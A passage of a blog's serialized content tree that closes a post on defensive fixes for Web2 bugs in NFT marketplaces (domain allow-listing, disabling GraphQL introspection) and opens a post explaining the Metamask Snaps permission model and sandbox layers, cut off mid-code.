allowDomains",{"type":27,"tag":207,"props":42392,"children":42393},{"style":226},[42394],{"type":33,"value":229},{"type":27,"tag":207,"props":42396,"children":42397},{"style":238},[42398],{"type":33,"value":30305},{"type":27,"tag":207,"props":42400,"children":42401},{"style":1325},[42402],{"type":33,"value":42403},"'https://allowed-domain'",{"type":27,"tag":207,"props":42405,"children":42406},{"style":238},[42407],{"type":33,"value":38834},{"type":27,"tag":207,"props":42409,"children":42410},{"class":209,"line":244},[42411,42415,42419,42423,42428,42432,42437,42441,42445],{"type":27,"tag":207,"props":42412,"children":42413},{"style":376},[42414],{"type":33,"value":9023},{"type":27,"tag":207,"props":42416,"children":42417},{"style":238},[42418],{"type":33,"value":686},{"type":27,"tag":207,"props":42420,"children":42421},{"style":226},[42422],{"type":33,"value":27893},{"type":27,"tag":207,"props":42424,"children":42425},{"style":220},[42426],{"type":33,"value":42427},"allowDomains",{"type":27,"tag":207,"props":42429,"children":42430},{"style":238},[42431],{"type":33,"value":1041},{"type":27,"tag":207,"props":42433,"children":42434},{"style":1335},[42435],{"type":33,"value":42436},"includes",{"type":27,"tag":207,"props":42438,"children":42439},{"style":238},[42440],{"type":33,"value":1343},{"type":27,"tag":207,"props":42442,"children":42443},{"style":220},[42444],{"type":33,"value":39975},{"type":27,"tag":207,"props":42446,"children":42447},{"style":238},[42448],{"type":33,"value":8955},{"type":27,"tag":207,"props":42450,"children":42451},{"class":209,"line":270},[42452,42456,42460,42465,42469,42474],{"type":27,"tag":207,"props":42453,"children":42454},{"style":376},[42455],{"type":33,"value":392},{"type":27,"tag":207,"props":42457,"children":42458},{"style":214},[42459],{"type":33,"value":1597},{"type":27,"tag":207,"props":42461,"children":42462},{"style":1335},[42463],{"type":33,"value":42464}," ApolloError",{"type":27,"tag":207,"props":42466,"children":42467},{"style":238},[42468],{"type":33,"value":1343},{"type":27,"tag":207,"props":42470,"children":42471},{"style":1325},[42472],{"type":33,"value":42473},"'invalid domain'",{"type":27,"tag":207,"props":42475,"children":42476},{"style":238},[42477],{"type":33,"value":1455},{"type":27,"tag":207,"props":42479,"children":42480},{"class":209,"line":296},[42481],{"type":27,"tag":207,"props":42482,"children":42483},{"style":238},[42484],{"type":33,"value":451},{"type":27,"tag":36,"props":42486,"children":42487},{},[42488,42490,42497,42499,42506],{"type":33,"value":42489},"As ",{"type":27,"tag":47,"props":42491,"children":42494},{"href":42492,"rel":42493},"https://graphql.org/",[51],[42495],{"type":33,"value":42496},"GraphQl",{"type":33,"value":42498}," is widely utilized by NFT marketplaces, it is crucial to understand the reasons behind disabling certain features like ",{"type":27,"tag":47,"props":42500,"children":42503},{"href":42501,"rel":42502},"https://graphql.org/learn/introspection/",[51],[42504],{"type":33,"value":42505},"introspection",{"type":33,"value":42507}," in production environments. By disabling introspection, it ensures that clients are unable to query the API's schema, preventing the potential exposure of sensitive information regarding its structure and implementation. Below, we provide an example of how to achieve this using the Apollo server:",{"type":27,"tag":101,"props":42509,"children":42511},{"className":201,"code":42510,"language":200,"meta":7,"style":7},"const server = new ApolloServer({\n typeDefs,\n resolvers,\n introspection: false,\n});\n",[42512],{"type":27,"tag":84,"props":42513,"children":42514},{"__ignoreMap":7},[42515,42544,42556,42568,42584],{"type":27,"tag":207,"props":42516,"children":42517},{"class":209,"line":210},[42518,42522,42527,42531,42535,42540],{"type":27,"tag":207,"props":42519,"children":42520},{"style":214},[42521],{"type":33,"value":16931},{"type":27,"tag":207,"props":42523,"children":42524},{"style":220},[42525],{"type":33,"value":42526}," server",{"type":27,"tag":207,"props":42528,"children":42529},{"style":226},[42530],{"type":33,"value":229},{"type":27,"tag":207,"props":42532,"children":42533},{"style":214},[42534],{"type":33,"value":1597},{"type":27,"tag":207,"props":42536,"children":42537},{"style":1335},[42538],{"type":33,"value":42539}," ApolloServer",{"type":27,"tag":207,"props":42541,"children":42542},{"style":238},[42543],{"type":33,"value":22415},{"type":27,"tag":207,"props":42545,"children":42546},{"class":209,"line":244},[42547,42552],{"type":27,"tag":207,"props":42548,"children":42549},{"style":220},[42550],{"type":33,"value":42551}," typeDefs",{"type":27,"tag":207,"props":42553,"children":42554},{"style":238},[42555],{"type":33,"value":1842},{"type":27,"tag":207,"props":42557,"children":42558},{"class":209,"line":270},[42559,42564],{"type":27,"tag":207,"props":42560,"children":42561},{"style":220},[42562],{"type":33,"value":42563}," resolvers",{"type":27,"tag":207,"props":42565,"children":42566},{"style":238},[42567],{"type":33,"value":1842},{"type":27,"tag":207,"props":42569,"children":42570},{"class":209,"line":296},[42571,42576,42580],{"type":27,"tag":207,"props":42572,"children":42573},{"style":220},[42574],{"type":33,"value":42575}," introspection:",{"type":27,"tag":207,"props":42577,"children":42578},{"style":214},[42579],{"type":33,"value":16337},{"type":27,"tag":207,"props":42581,"children":42582},{"style":238},[42583],{"type":33,"value":1842},{"type":27,"tag":207,"props":42585,"children":42586},{"class":209,"line":445},[42587],{"type":27,"tag":207,"props":42588,"children":42589},{"style":238},[42590],{"type":33,"value":42591},"});\n",{"type":27,"tag":36,"props":42593,"children":42594},{},[42595,42597,42604,42606,42613],{"type":33,"value":42596},"Similarly, when ",{"type":27,"tag":47,"props":42598,"children":42601},{"href":42599,"rel":42600},"https://www.apollographql.com/blog/apollo-client/performance/batching-client-graphql-queries/",[51],[42602],{"type":33,"value":42603},"batching",{"type":33,"value":42605}," is enabled, the code should limit the number of queries that can run simultaneously and implement object request rate limiting. This additional measure helps protect the website from potential ",{"type":27,"tag":47,"props":42607,"children":42610},{"href":42608,"rel":42609},"https://en.wikipedia.org/wiki/Denial-of-service_attack",[51],[42611],{"type":33,"value":42612},"denial-of-service",{"type":33,"value":42614}," (DoS) attacks.",{"type":27,"tag":36,"props":42616,"children":42617},{},[42618],{"type":33,"value":42619},"Lastly, NFT marketplaces should pay close attention to authentication and authorization controls. Specifically, addressing third-party platform misconfiguration. Applying the least privilege principle is crucial for enhancing security.",{"type":27,"tag":36,"props":42621,"children":42622},{},[42623],{"type":33,"value":42624},"By implementing these security measures, NFT marketplaces can strengthen their security posture, build trust among users, and create a secure environment for the trading and exchange of valuable digital assets.",{"type":27,"tag":42626,"props":42627,"children":42628},"h1",{"id":10112},[42629],{"type":33,"value":10115},{"type":27,"tag":36,"props":42631,"children":42632},{},[42633],{"type":33,"value":42634},"To recap, the presence of Web 2 bugs in NFT marketplaces emphasizes the need to address the underlying security issues within these platforms. Developers must prioritize not only the integrity of on-chain operations, but also the security of off-chain processes. To ensure an overall robust and trustworthy ecosystem for NFT marketplaces, developers should focus on implementing comprehensive security measures across all the components of the marketplace, engage with third party auditor, and test the entire infrastructure as necessary to identify and address any potential vulnerabilities.",{"type":27,"tag":36,"props":42636,"children":42637},{},[42638],{"type":33,"value":42639},"Most of all, it is especially crucial to educate communities about risks and security best practices. By promoting awareness and providing transparent information, platforms can empower users to make informed decisions and protect themselves against potential scams or fraudulent activities.",{"type":27,"tag":28,"props":42641,"children":42643},{"id":42642},"disclaimer",[42644],{"type":33,"value":42645},"Disclaimer",{"type":27,"tag":36,"props":42647,"children":42648},{},[42649],{"type":33,"value":42650},"Despite our consistent efforts to contact the Rocki Marketplace team regarding our findings, we unfortunately have not received a response. As a result, we decided to disclose this matter to our readers. We will continue to closely monitor the situation and remain open in helping their team resolve this issue.",{"type":27,"tag":10127,"props":42652,"children":42653},{},[42654],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":42656},[42657,42660,42666,42670,42671],{"id":30,"depth":244,"text":34,"children":42658},[42659],{"id":10207,"depth":270,"text":10210},{"id":38469,"depth":244,"text":38499,"children":42661},[42662,42663,42664,42665],{"id":38518,"depth":270,"text":38521},{"id":38583,"depth":270,"text":38586},{"id":41407,"depth":270,"text":41410},{"id":41697,"depth":270,"text":41700},{"id":42042,"depth":244,"text":42045,"children":42667},[42668,42669],{"id":42064,"depth":270,"text":42067},{"id":42114,"depth":270,"text":42117},{"id":42198,"depth":244,"text":42204},{"id":42642,"depth":244,"text":42645},"content:blog:2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions",{"_path":42676,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":42677,"description":42678,"author":42679,"image":42680,"date":42682,"isFeatured":19,"onBlogPage":19,"body":42683,"_type":10152,"_id":47689,"_source":10154,"_file":47690,"_stem":47691,"_extension":10157},"/blog/2023-11-01-metamask-snaps","Metamask Snaps: Playing in the Sand","A deep dig into Metamask Snaps. We explore safety considerations, environment design, and break down a property spoofing vulnerability in the Snaps sandboxing layer.",[38463,38462],{"src":42681,"height":20900,"width":18},"/posts/metamask-snaps/header.png","2023-11-01",{"type":24,"children":42684,"toc":47670},[42685,42689,42694,42699,42704,42710,42715,42721,42734,42739,42744,42751,42783,42789,42794,42812,42819,42825,42839,42845,42865,43127,43155,43161,43180,43564,43583,43596,43914,43935,44206,44211,44217,44222,44235,44240,44253,44512,44556,44569,44575,44589,44595,44601,44614,44651,44657,44677,44787,44813,44819,44837,44850,44856,44861,44879,44990,44995,45016,45029,45046,45145,45171,45188,45310,45336,45348,45353,45359,45365,45370,45393,45398,45403,45409,45415,45442,45844,45871,45898,45904,45935,46244,46263,46268,46293,46306,46312,46339,46633,46669,46687,46692,46727,46732,46736,46741,46748,46753,46780,47556,47576,47582,47603,47652,47656,47661,47666],{"type":27,"tag":28,"props":42686,"children":42687},{"id":26226},[42688],{"type":33,"value":26229},{"type":27,"tag":36,"props":42690,"children":42691},{},[42692],{"type":33,"value":42693},"Metamask snaps are simple modules that extend Metamask's functionality. These modules can be written by anyone, and provide useful features that the vanilla wallet doesn't.",{"type":27,"tag":36,"props":42695,"children":42696},{},[42697],{"type":33,"value":42698},"Metamask provides a sandboxed environment that allows developers to run Snap code safely, without disclosing or tampering with critical information without user permission.",{"type":27,"tag":36,"props":42700,"children":42701},{},[42702],{"type":33,"value":42703},"In this article, we'll explore exactly how the snap execution environment works. We'll then delve into a unique property spoofing vulnerability we reported in the Metamask Snaps sandbox.",{"type":27,"tag":28,"props":42705,"children":42707},{"id":42706},"sandbox-security",[42708],{"type":33,"value":42709},"Sandbox Security",{"type":27,"tag":36,"props":42711,"children":42712},{},[42713],{"type":33,"value":42714},"In the first part of the article, we'll describe how the Metamask sandbox works, and examine what it's doing to protect the security of Snaps.",{"type":27,"tag":58,"props":42716,"children":42718},{"id":42717},"permission-based-security",[42719],{"type":33,"value":42720},"Permission-based security",{"type":27,"tag":36,"props":42722,"children":42723},{},[42724,42726,42732],{"type":33,"value":42725},"Each snap is built to have only the permissions it needs to hold. These permissions are specified in the ",{"type":27,"tag":84,"props":42727,"children":42729},{"className":42728},[],[42730],{"type":33,"value":42731},"snap.manifest.json",{"type":33,"value":42733}," file and can be critical to security.",{"type":27,"tag":36,"props":42735,"children":42736},{},[42737],{"type":33,"value":42738},"Snap security is totally centered around the user, whose decisions can provide dangerous permissions to a malicious snap. Metamask warns about the risk of each permission.",{"type":27,"tag":36,"props":42740,"children":42741},{},[42742],{"type":33,"value":42743},"Here are the critical permissions possible to be given to a snap:",{"type":27,"tag":36,"props":42745,"children":42746},{},[42747],{"type":27,"tag":126,"props":42748,"children":42750},{"alt":7,"src":42749},"/posts/metamask-snaps/permissions.png",[],{"type":27,"tag":1228,"props":42752,"children":42753},{},[42754,42772],{"type":27,"tag":1232,"props":42755,"children":42756},{},[42757,42763,42764,42770],{"type":27,"tag":84,"props":42758,"children":42760},{"className":42759},[],[42761],{"type":33,"value":42762},"snap_getBip44Entropy",{"type":33,"value":1131},{"type":27,"tag":84,"props":42765,"children":42767},{"className":42766},[],[42768],{"type":33,"value":42769},"snap_getBip32Entropy",{"type":33,"value":42771}," -> a malicious snap retrieving keypair leads to loss of funds",{"type":27,"tag":1232,"props":42773,"children":42774},{},[42775,42781],{"type":27,"tag":84,"props":42776,"children":42778},{"className":42777},[],[42779],{"type":33,"value":42780},"endowment:transaction-insight",{"type":33,"value":42782}," -> a malicious snap getting insights of a transaction before approval can lead to frontrunning attacks",{"type":27,"tag":58,"props":42784,"children":42786},{"id":42785},"snap-execution-environment",[42787],{"type":33,"value":42788},"Snap execution environment",{"type":27,"tag":36,"props":42790,"children":42791},{},[42792],{"type":33,"value":42793},"Snaps are executed in a totally sandboxed environment which provides a safe context for executing untrusted code, and separates it from the normal execution flow. To accomplish this, Metamask uses 3 layers of security to create this safe environment:",{"type":27,"tag":12719,"props":42795,"children":42796},{},[42797,42802,42807],{"type":27,"tag":1232,"props":42798,"children":42799},{},[42800],{"type":33,"value":42801},"An isolated iframe",{"type":27,"tag":1232,"props":42803,"children":42804},{},[42805],{"type":33,"value":42806},"LavaMoat",{"type":27,"tag":1232,"props":42808,"children":42809},{},[42810],{"type":33,"value":42811},"SES (Secure EcmaScript)",{"type":27,"tag":36,"props":42813,"children":42814},{},[42815],{"type":27,"tag":126,"props":42816,"children":42818},{"alt":7,"src":42817},"/posts/metamask-snaps/environment.png",[],{"type":27,"tag":58,"props":42820,"children":42822},{"id":42821},"isolated-iframe-layer-1",[42823],{"type":33,"value":42824},"Isolated Iframe - Layer 1",{"type":27,"tag":36,"props":42826,"children":42827},{},[42828,42830,42837],{"type":33,"value":42829},"Snaps empower developers to enhance Metamask's functionality while maintaining a strong security posture. These modules execute within an ",{"type":27,"tag":47,"props":42831,"children":42834},{"href":42832,"rel":42833},"https://blog.logrocket.com/the-ultimate-guide-to-iframes/",[51],[42835],{"type":33,"value":42836},"Iframe",{"type":33,"value":42838}," environment, ensuring they are isolated and secure. To facilitate this execution, Metamask takes advantage of an iFrame sandboxing mechanism, allowing snaps to operate in a contained context.",{"type":27,"tag":26163,"props":42840,"children":42842},{"id":42841},"the-framework-metamask-extension-repo",[42843],{"type":33,"value":42844},"The Framework: Metamask-Extension Repo",{"type":27,"tag":36,"props":42846,"children":42847},{},[42848,42850,42856,42858,42864],{"type":33,"value":42849},"The process of snap execution kicks off within the metamask-extension repository's ",{"type":27,"tag":84,"props":42851,"children":42853},{"className":42852},[],[42854],{"type":33,"value":42855},"metamask-controller.js",{"type":33,"value":42857}," file. Here's a glimpse of the relevant ",{"type":27,"tag":47,"props":42859,"children":42862},{"href":42860,"rel":42861},"https://github.com/MetaMask/metamask-extension/blob/4b23ea8c95bea9ea12336537bb6bda4568a99098/app/scripts/metamask-controller.js#L978",[51],[42863],{"type":33,"value":84},{"type":33,"value":736},{"type":27,"tag":101,"props":42866,"children":42868},{"className":1571,"code":42867,"language":1570,"meta":7,"style":7},"// Import snaps-controllers\n// ...\nconst snapExecutionServiceArgs = {\n iframeUrl: new URL(process.env.IFRAME_EXECUTION_ENVIRONMENT_URL),\n messenger: this.controllerMessenger.getRestricted({\n name: 'ExecutionService',\n }),\n setupSnapProvider: this.setupSnapProvider.bind(this),\n};\n\n// Define IFRAME_EXECUTION_ENVIRONMENT_URL\nprocess.env.IFRAME_EXECUTION_ENVIRONMENT_URL =\n 'https://execution.metamask.io/0.36.1-flask.1/index.html';\n// ...\n",[42869],{"type":27,"tag":84,"props":42870,"children":42871},{"__ignoreMap":7},[42872,42880,42888,42908,42956,42991,43008,43016,43058,43065,43072,43080,43108,43120],{"type":27,"tag":207,"props":42873,"children":42874},{"class":209,"line":210},[42875],{"type":27,"tag":207,"props":42876,"children":42877},{"style":4647},[42878],{"type":33,"value":42879},"// Import snaps-controllers\n",{"type":27,"tag":207,"props":42881,"children":42882},{"class":209,"line":244},[42883],{"type":27,"tag":207,"props":42884,"children":42885},{"style":4647},[42886],{"type":33,"value":42887},"// ...\n",{"type":27,"tag":207,"props":42889,"children":42890},{"class":209,"line":270},[42891,42895,42900,42904],{"type":27,"tag":207,"props":42892,"children":42893},{"style":214},[42894],{"type":33,"value":16931},{"type":27,"tag":207,"props":42896,"children":42897},{"style":220},[42898],{"type":33,"value":42899}," snapExecutionServiceArgs",{"type":27,"tag":207,"props":42901,"children":42902},{"style":226},[42903],{"type":33,"value":229},{"type":27,"tag":207,"props":42905,"children":42906},{"style":238},[42907],{"type":33,"value":384},{"type":27,"tag":207,"props":42909,"children":42910},{"class":209,"line":296},[42911,42916,42920,42925,42929,42934,42938,42943,42947,42952],{"type":27,"tag":207,"props":42912,"children":42913},{"style":220},[42914],{"type":33,"value":42915}," iframeUrl:",{"type":27,"tag":207,"props":42917,"children":42918},{"style":214},[42919],{"type":33,"value":1597},{"type":27,"tag":207,"props":42921,"children":42922},{"style":1335},[42923],{"type":33,"value":42924}," URL",{"type":27,"tag":207,"props":42926,"children":42927},{"style":238},[42928],{"type":33,"value":1343},{"type":27,"tag":207,"props":42930,"children":42931},{"style":220},[42932],{"type":33,"value":42933},"process",{"type":27,"tag":207,"props":42935,"children":42936},{"style":238},[42937],{"type":33,"value":1041},{"type":27,"tag":207,"props":42939,"children":42940},{"style":220},[42941],{"type":33,"value":42942},"env",{"type":27,"tag":207,"props":42944,"children":42945},{"style":238},[42946],{"type":33,"value":1041},{"type":27,"tag":207,"props":42948,"children":42949},{"style":220},[42950],{"type":33,"value":42951},"IFRAME_EXECUTION_ENVIRONMENT_URL",{"type":27,"tag":207,"props":42953,"children":42954},{"style":238},[42955],{"type":33,"value":14018},{"type":27,"tag":207,"props":42957,"children":42958},{"class":209,"line":445},[42959,42964,42969,42973,42978,42982,42987],{"type":27,"tag":207,"props":42960,"children":42961},{"style":220},[42962],{"type":33,"value":42963}," messenger:",{"type":27,"tag":207,"props":42965,"children":42966},{"style":214},[42967],{"type":33,"value":42968}," this",{"type":27,"tag":207,"props":42970,"children":42971},{"style":238},[42972],{"type":33,"value":1041},{"type":27,"tag":207,"props":42974,"children":42975},{"style":220},[42976],{"type":33,"value":42977},"controllerMessenger",{"type":27,"tag":207,"props":42979,"children":42980},{"style":238},[42981],{"type":33,"value":1041},{"type":27,"tag":207,"props":42983,"children":42984},{"style":1335},[42985],{"type":33,"value":42986},"getRestricted",{"type":27,"tag":207,"props":42988,"children":42989},{"style":238},[42990],{"type":33,"value":22415},{"type":27,"tag":207,"props":42992,"children":42993},{"class":209,"line":867},[42994,42999,43004],{"type":27,"tag":207,"props":42995,"children":42996},{"style":220},[42997],{"type":33,"value":42998}," name:",{"type":27,"tag":207,"props":43000,"children":43001},{"style":1325},[43002],{"type":33,"value":43003}," 'ExecutionService'",{"type":27,"tag":207,"props":43005,"children":43006},{"style":238},[43007],{"type":33,"value":1842},{"type":27,"tag":207,"props":43009,"children":43010},{"class":209,"line":892},[43011],{"type":27,"tag":207,"props":43012,"children":43013},{"style":238},[43014],{"type":33,"value":43015}," }),\n",{"type":27,"tag":207,"props":43017,"children":43018},{"class":209,"line":1475},[43019,43024,43028,43032,43037,43041,43046,43050,43054],{"type":27,"tag":207,"props":43020,"children":43021},{"style":220},[43022],{"type":33,"value":43023}," setupSnapProvider:",{"type":27,"tag":207,"props":43025,"children":43026},{"style":214},[43027],{"type":33,"value":42968},{"type":27,"tag":207,"props":43029,"children":43030},{"style":238},[43031],{"type":33,"value":1041},{"type":27,"tag":207,"props":43033,"children":43034},{"style":220},[43035],{"type":33,"value":43036},"setupSnapProvider",{"type":27,"tag":207,"props":43038,"children":43039},{"style":238},[43040],{"type":33,"value":1041},{"type":27,"tag":207,"props":43042,"children":43043},{"style":1335},[43044],{"type":33,"value":43045},"bind",{"type":27,"tag":207,"props":43047,"children":43048},{"style":238},[43049],{"type":33,"value":1343},{"type":27,"tag":207,"props":43051,"children":43052},{"style":214},[43053],{"type":33,"value":24964},{"type":27,"tag":207,"props":43055,"children":43056},{"style":238},[43057],{"type":33,"value":14018},{"type":27,"tag":207,"props":43059,"children":43060},{"class":209,"line":2065},[43061],{"type":27,"tag":207,"props":43062,"children":43063},{"style":238},[43064],{"type":33,"value":23852},{"type":27,"tag":207,"props":43066,"children":43067},{"class":209,"line":2092},[43068],{"type":27,"tag":207,"props":43069,"children":43070},{"emptyLinePlaceholder":19},[43071],{"type":33,"value":2062},{"type":27,"tag":207,"props":43073,"children":43074},{"class":209,"line":2130},[43075],{"type":27,"tag":207,"props":43076,"children":43077},{"style":4647},[43078],{"type":33,"value":43079},"// Define IFRAME_EXECUTION_ENVIRONMENT_URL\n",{"type":27,"tag":207,"props":43081,"children":43082},{"class":209,"line":2168},[43083,43087,43091,43095,43099,43103],{"type":27,"tag":207,"props":43084,"children":43085},{"style":220},[43086],{"type":33,"value":42933},{"type":27,"tag":207,"props":43088,"children":43089},{"style":238},[43090],{"type":33,"value":1041},{"type":27,"tag":207,"props":43092,"children":43093},{"style":220},[43094],{"type":33,"value":42942},{"type":27,"tag":207,"props":43096,"children":43097},{"style":238},[43098],{"type":33,"value":1041},{"type":27,"tag":207,"props":43100,"children":43101},{"style":220},[43102],{"type":33,"value":42951},{"type":27,"tag":207,"props":43104,"children":43105},{"style":226},[43106],{"type":33,"value":43107}," =\n",{"type":27,"tag":207,"props":43109,"children":43110},{"class":209,"line":4095},[43111,43116],{"type":27,"tag":207,"props":43112,"children":43113},{"style":1325},[43114],{"type":33,"value":43115}," 'https://execution.metamask.io/0.36.1-flask.1/index.html'",{"type":27,"tag":207,"props":43117,"children":43118},{"style":238},[43119],{"type":33,"value":241},{"type":27,"tag":207,"props":43121,"children":43122},{"class":209,"line":4103},[43123],{"type":27,"tag":207,"props":43124,"children":43125},{"style":4647},[43126],{"type":33,"value":42887},{"type":27,"tag":36,"props":43128,"children":43129},{},[43130,43132,43138,43140,43146,43148,43153],{"type":33,"value":43131},"This code is defining the ",{"type":27,"tag":84,"props":43133,"children":43135},{"className":43134},[],[43136],{"type":33,"value":43137},"snapExecutionServiceArgs",{"type":33,"value":43139}," object, which contains information required for the ",{"type":27,"tag":84,"props":43141,"children":43143},{"className":43142},[],[43144],{"type":33,"value":43145},"IframeExecutionService",{"type":33,"value":43147}," to execute snaps. The ",{"type":27,"tag":84,"props":43149,"children":43151},{"className":43150},[],[43152],{"type":33,"value":42951},{"type":33,"value":43154}," points to the location where the execution environment resides.",{"type":27,"tag":26163,"props":43156,"children":43158},{"id":43157},"executing-snaps-iframeexecutionservice-in-action",[43159],{"type":33,"value":43160},"Executing Snaps: IframeExecutionService in Action",{"type":27,"tag":36,"props":43162,"children":43163},{},[43164,43166,43171,43173,43179],{"type":33,"value":43165},"Inside the snaps-controller package's IframeExecutionService.ts file, the ",{"type":27,"tag":84,"props":43167,"children":43169},{"className":43168},[],[43170],{"type":33,"value":43145},{"type":33,"value":43172}," orchestrates snap execution. Again, here's a snippet of the relevant ",{"type":27,"tag":47,"props":43174,"children":43177},{"href":43175,"rel":43176},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/AbstractExecutionService.ts#L89",[51],[43178],{"type":33,"value":84},{"type":33,"value":736},{"type":27,"tag":101,"props":43181,"children":43185},{"className":43182,"code":43183,"language":43184,"meta":7,"style":7},"language-typescript shiki shiki-themes slack-dark","// Register message handlers for snap interactions\nthis.#messenger.registerActionHandler(\n `${controllerName}:handleRpcRequest`,\n async (snapId: string, options: SnapRpcHookArgs) =>\n this.handleRpcRequest(snapId, options),\n);\n\n// More handlers for executeSnap, terminateSnap, etc.\n// ...\n\n// Execute a snap\nasync executeSnap(snapData: SnapExecutionData) {\n // Initialize job, streams, and environment\n const { jobId } = await this.initJob(snapData);\n const { worker, stream } = await this.initEnvStream(jobId);\n // ...\n}\n","typescript",[43186],{"type":27,"tag":84,"props":43187,"children":43188},{"__ignoreMap":7},[43189,43197,43226,43256,43309,43346,43353,43360,43368,43375,43382,43390,43424,43432,43487,43549,43557],{"type":27,"tag":207,"props":43190,"children":43191},{"class":209,"line":210},[43192],{"type":27,"tag":207,"props":43193,"children":43194},{"style":4647},[43195],{"type":33,"value":43196},"// Register message handlers for snap interactions\n",{"type":27,"tag":207,"props":43198,"children":43199},{"class":209,"line":244},[43200,43204,43208,43213,43217,43222],{"type":27,"tag":207,"props":43201,"children":43202},{"style":214},[43203],{"type":33,"value":24964},{"type":27,"tag":207,"props":43205,"children":43206},{"style":238},[43207],{"type":33,"value":1041},{"type":27,"tag":207,"props":43209,"children":43210},{"style":220},[43211],{"type":33,"value":43212},"#messenger",{"type":27,"tag":207,"props":43214,"children":43215},{"style":238},[43216],{"type":33,"value":1041},{"type":27,"tag":207,"props":43218,"children":43219},{"style":1335},[43220],{"type":33,"value":43221},"registerActionHandler",{"type":27,"tag":207,"props":43223,"children":43224},{"style":238},[43225],{"type":33,"value":9090},{"type":27,"tag":207,"props":43227,"children":43228},{"class":209,"line":270},[43229,43234,43238,43243,43247,43252],{"type":27,"tag":207,"props":43230,"children":43231},{"style":1325},[43232],{"type":33,"value":43233}," `",{"type":27,"tag":207,"props":43235,"children":43236},{"style":214},[43237],{"type":33,"value":41364},{"type":27,"tag":207,"props":43239,"children":43240},{"style":220},[43241],{"type":33,"value":43242},"controllerName",{"type":27,"tag":207,"props":43244,"children":43245},{"style":214},[43246],{"type":33,"value":41396},{"type":27,"tag":207,"props":43248,"children":43249},{"style":1325},[43250],{"type":33,"value":43251},":handleRpcRequest`",{"type":27,"tag":207,"props":43253,"children":43254},{"style":238},[43255],{"type":33,"value":1842},{"type":27,"tag":207,"props":43257,"children":43258},{"class":209,"line":296},[43259,43264,43268,43273,43277,43282,43286,43291,43295,43300,43304],{"type":27,"tag":207,"props":43260,"children":43261},{"style":214},[43262],{"type":33,"value":43263}," async",{"type":27,"tag":207,"props":43265,"children":43266},{"style":238},[43267],{"type":33,"value":686},{"type":27,"tag":207,"props":43269,"children":43270},{"style":220},[43271],{"type":33,"value":43272},"snapId",{"type":27,"tag":207,"props":43274,"children":43275},{"style":226},[43276],{"type":33,"value":736},{"type":27,"tag":207,"props":43278,"children":43279},{"style":8920},[43280],{"type":33,"value":43281}," string",{"type":27,"tag":207,"props":43283,"children":43284},{"style":238},[43285],{"type":33,"value":1123},{"type":27,"tag":207,"props":43287,"children":43288},{"style":220},[43289],{"type":33,"value":43290},"options",{"type":27,"tag":207,"props":43292,"children":43293},{"style":226},[43294],{"type":33,"value":736},{"type":27,"tag":207,"props":43296,"children":43297},{"style":8920},[43298],{"type":33,"value":43299}," SnapRpcHookArgs",{"type":27,"tag":207,"props":43301,"children":43302},{"style":238},[43303],{"type":33,"value":2222},{"type":27,"tag":207,"props":43305,"children":43306},{"style":214},[43307],{"type":33,"value":43308},"=>\n",{"type":27,"tag":207,"props":43310,"children":43311},{"class":209,"line":445},[43312,43317,43321,43326,43330,43334,43338,43342],{"type":27,"tag":207,"props":43313,"children":43314},{"style":214},[43315],{"type":33,"value":43316}," this",{"type":27,"tag":207,"props":43318,"children":43319},{"style":238},[43320],{"type":33,"value":1041},{"type":27,"tag":207,"props":43322,"children":43323},{"style":1335},[43324],{"type":33,"value":43325},"handleRpcRequest",{"type":27,"tag":207,"props":43327,"children":43328},{"style":238},[43329],{"type":33,"value":1343},{"type":27,"tag":207,"props":43331,"children":43332},{"style":220},[43333],{"type":33,"value":43272},{"type":27,"tag":207,"props":43335,"children":43336},{"style":238},[43337],{"type":33,"value":1123},{"type":27,"tag":207,"props":43339,"children":43340},{"style":220},[43341],{"type":33,"value":43290},{"type":27,"tag":207,"props":43343,"children":43344},{"style":238},[43345],{"type":33,"value":14018},{"type":27,"tag":207,"props":43347,"children":43348},{"class":209,"line":867},[43349],{"type":27,"tag":207,"props":43350,"children":43351},{"style":238},[43352],{"type":33,"value":1455},{"type":27,"tag":207,"props":43354,"children":43355},{"class":209,"line":892},[43356],{"type":27,"tag":207,"props":43357,"children":43358},{"emptyLinePlaceholder":19},[43359],{"type":33,"value":2062},{"type":27,"tag":207,"props":43361,"children":43362},{"class":209,"line":1475},[43363],{"type":27,"tag":207,"props":43364,"children":43365},{"style":4647},[43366],{"type":33,"value":43367},"// More handlers for executeSnap, terminateSnap, etc.\n",{"type":27,"tag":207,"props":43369,"children":43370},{"class":209,"line":2065},[43371],{"type":27,"tag":207,"props":43372,"children":43373},{"style":4647},[43374],{"type":33,"value":42887},{"type":27,"tag":207,"props":43376,"children":43377},{"class":209,"line":2092},[43378],{"type":27,"tag":207,"props":43379,"children":43380},{"emptyLinePlaceholder":19},[43381],{"type":33,"value":2062},{"type":27,"tag":207,"props":43383,"children":43384},{"class":209,"line":2130},[43385],{"type":27,"tag":207,"props":43386,"children":43387},{"style":4647},[43388],{"type":33,"value":43389},"// Execute a snap\n",{"type":27,"tag":207,"props":43391,"children":43392},{"class":209,"line":2168},[43393,43397,43402,43406,43411,43415,43420],{"type":27,"tag":207,"props":43394,"children":43395},{"style":220},[43396],{"type":33,"value":2311},{"type":27,"tag":207,"props":43398,"children":43399},{"style":1335},[43400],{"type":33,"value":43401}," executeSnap",{"type":27,"tag":207,"props":43403,"children":43404},{"style":238},[43405],{"type":33,"value":1343},{"type":27,"tag":207,"props":43407,"children":43408},{"style":220},[43409],{"type":33,"value":43410},"snapData",{"type":27,"tag":207,"props":43412,"children":43413},{"style":238},[43414],{"type":33,"value":22606},{"type":27,"tag":207,"props":43416,"children":43417},{"style":220},[43418],{"type":33,"value":43419},"SnapExecutionData",{"type":27,"tag":207,"props":43421,"children":43422},{"style":238},[43423],{"type":33,"value":1424},{"type":27,"tag":207,"props":43425,"children":43426},{"class":209,"line":4095},[43427],{"type":27,"tag":207,"props":43428,"children":43429},{"style":4647},[43430],{"type":33,"value":43431}," // Initialize job, streams, and 